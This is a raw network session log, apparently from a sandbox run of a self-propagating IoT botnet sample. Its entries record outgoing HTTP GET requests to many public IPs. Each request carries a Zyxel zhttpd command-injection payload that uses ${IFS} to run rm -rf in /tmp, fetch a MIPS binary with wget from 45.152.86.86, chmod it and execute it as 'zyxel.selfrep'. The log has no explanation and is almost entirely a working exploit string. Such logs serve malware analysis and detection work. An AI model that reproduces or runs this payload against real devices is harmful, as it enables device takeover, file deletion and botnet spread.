                                        Mar 31, 2024 09:21:23.936547041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4868192.168.2.2338810102.37.202.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936584949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4869192.168.2.2348496133.204.123.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936642885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4870192.168.2.235122672.183.184.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936691046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4871192.168.2.2357846164.29.145.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936759949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4872192.168.2.2348618144.168.108.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936806917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4873192.168.2.2353362212.219.38.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936857939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4874192.168.2.2357876136.69.181.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936929941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4875192.168.2.2354602120.89.174.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936985970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4876192.168.2.2334820175.114.53.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937052965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4877192.168.2.2355776149.65.144.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937102079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4878192.168.2.2351616101.103.85.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937133074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4879192.168.2.2354044132.243.164.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937217951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4880192.168.2.234759043.110.170.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937258005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4881192.168.2.233993670.19.44.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937313080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4882192.168.2.2332950195.202.252.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937375069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4883192.168.2.2346028210.27.199.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937426090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4884192.168.2.2356388122.31.237.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937480927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4885192.168.2.235055242.42.180.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937540054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4886192.168.2.2336896203.233.157.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937593937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4887192.168.2.2341762171.166.50.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937671900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4888192.168.2.233716834.90.104.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937702894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4889192.168.2.2358108166.155.66.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937777042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4890192.168.2.2357686135.99.248.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937813044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4891192.168.2.234262877.111.0.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937859058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4892192.168.2.233454091.28.229.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937922955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4893192.168.2.2342910201.180.205.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.937978029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4894192.168.2.233704235.104.139.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938055038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4895192.168.2.2345748160.125.70.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938110113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4896192.168.2.2346130126.160.199.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938184023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4897192.168.2.233735281.206.66.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938246965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4898192.168.2.2341488161.204.198.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938292980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4899192.168.2.2337406204.162.95.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938344002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4900192.168.2.235457039.177.243.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938399076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4901192.168.2.233880039.186.216.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938472033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4902192.168.2.234875239.77.146.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938524961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4903192.168.2.2349270158.65.49.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938586950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4904192.168.2.2356204170.217.190.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938647032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4905192.168.2.234804225.158.30.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938703060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4906192.168.2.2337592183.92.197.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938754082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4907192.168.2.2349454204.19.18.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938846111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4908192.168.2.233605060.17.221.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938904047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4909192.168.2.2351770121.79.193.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.938951015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4910192.168.2.23593869.233.78.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939029932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4911192.168.2.233948291.47.74.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939090967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4912192.168.2.2337690117.13.173.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939157963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4913192.168.2.2354964148.151.179.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939209938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4914192.168.2.23459442.74.51.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939307928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4915192.168.2.2344948120.121.206.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939354897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4916192.168.2.2343884151.174.90.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939424038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4917192.168.2.2356106137.206.194.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939456940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4918192.168.2.235129462.80.134.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939537048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4919192.168.2.2335584219.181.48.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939574003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4920192.168.2.2336442126.88.106.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939625025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4921192.168.2.2359642141.174.108.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939654112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4922192.168.2.2333700132.157.16.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939690113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4923192.168.2.235850857.87.76.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939740896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4924192.168.2.235502459.38.47.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939784050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4925192.168.2.2339858198.138.23.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939806938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4926192.168.2.2352494140.137.150.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939898014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4927192.168.2.235511480.202.67.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.939934969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4928192.168.2.234082864.222.183.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940018892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4929192.168.2.2353270157.247.177.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940049887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4930192.168.2.2350796116.102.184.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940088987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4931192.168.2.236028683.205.121.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940151930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4932192.168.2.235618641.228.18.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940207958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4933192.168.2.235639023.150.238.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940256119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4934192.168.2.2358122197.219.26.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940326929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4935192.168.2.2342956115.88.59.159443
                                        TimestampBytes transferredDirectionData
